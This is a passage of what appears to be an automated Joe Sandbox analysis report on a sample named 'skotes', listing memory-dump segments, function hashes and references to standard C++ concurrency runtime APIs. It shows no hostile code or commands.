                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2508902052-0
                                                                                                                                                                                                                                              • Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                                                                                                                                                                                                                                              • Instruction ID: 282110f1a581ced3bf4684da6b044f93f229e3c34df1811fedda5ff029c6ca03
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4A8148B1A00629EFCB19DFA8C580A7DB7F1FF48304B158AADD549AB701C770AD56CB84
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00BFEC81
                                                                                                                                                                                                                                                • Part of subcall function 00BF8F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00BF8F50
                                                                                                                                                                                                                                              • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00BFECE7
                                                                                                                                                                                                                                              • Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 00BFECFF
                                                                                                                                                                                                                                              • Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 00BFED0C
                                                                                                                                                                                                                                                • Part of subcall function 00BFE7AF: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 00BFE7D7
                                                                                                                                                                                                                                                • Part of subcall function 00BFE7AF: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 00BFE86F
                                                                                                                                                                                                                                                • Part of subcall function 00BFE7AF: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 00BFE879
                                                                                                                                                                                                                                                • Part of subcall function 00BFE7AF: Concurrency::location::_Assign.LIBCMT ref: 00BFE8AD
                                                                                                                                                                                                                                                • Part of subcall function 00BFE7AF: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 00BFE8B5
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2363638799-0
                                                                                                                                                                                                                                              • Opcode ID: 87b44803a35545d32b7ad2b750ddb4ddee29228e3ce09f3e58a8c29e63778bb8
                                                                                                                                                                                                                                              • Instruction ID: 9962a0bd718b8ba813f5ce566bf97324633cb7e746a19b226d4305d82c35cfcc
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 87b44803a35545d32b7ad2b750ddb4ddee29228e3ce09f3e58a8c29e63778bb8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A8518235A00209DBCF24DF50C895BBDB7B5EF44710F1540A9EA167B7A2CB71AE09CB91
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • NtFlushProcessWriteBuffers.NTDLL ref: 00BECBAA
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: BuffersFlushProcessWrite
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2982998374-0
                                                                                                                                                                                                                                              • Opcode ID: b1cc3523dd74d6cc85ea70e98b7dbd9718ab420fda802b77ec233bc0284c940d
                                                                                                                                                                                                                                              • Instruction ID: e977824080bcd94c7d2026374e8ef56dc785a930b0aabde961a2d83c3c40fbb6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1cc3523dd74d6cc85ea70e98b7dbd9718ab420fda802b77ec233bc0284c940d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F9B09232B2393487CA612B24BC0979D7B649A80A1130A1197E801A76248B101D834BD4
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 6ae6579bd42ffed57fb20760df4e0c4a461f39c0b1af76e2b65e6aa3fa740bb6
                                                                                                                                                                                                                                              • Instruction ID: d95ef1eae2d0ae3e1e22f78509889eeabc97b3f10a548e36e1d07a894d96e1b5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6ae6579bd42ffed57fb20760df4e0c4a461f39c0b1af76e2b65e6aa3fa740bb6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C518BB2E11706CBDB19CF5AD8857AEB7F1FB58304F2485AAD405EB250D3B4AD40CB90
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00BEF2BB
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
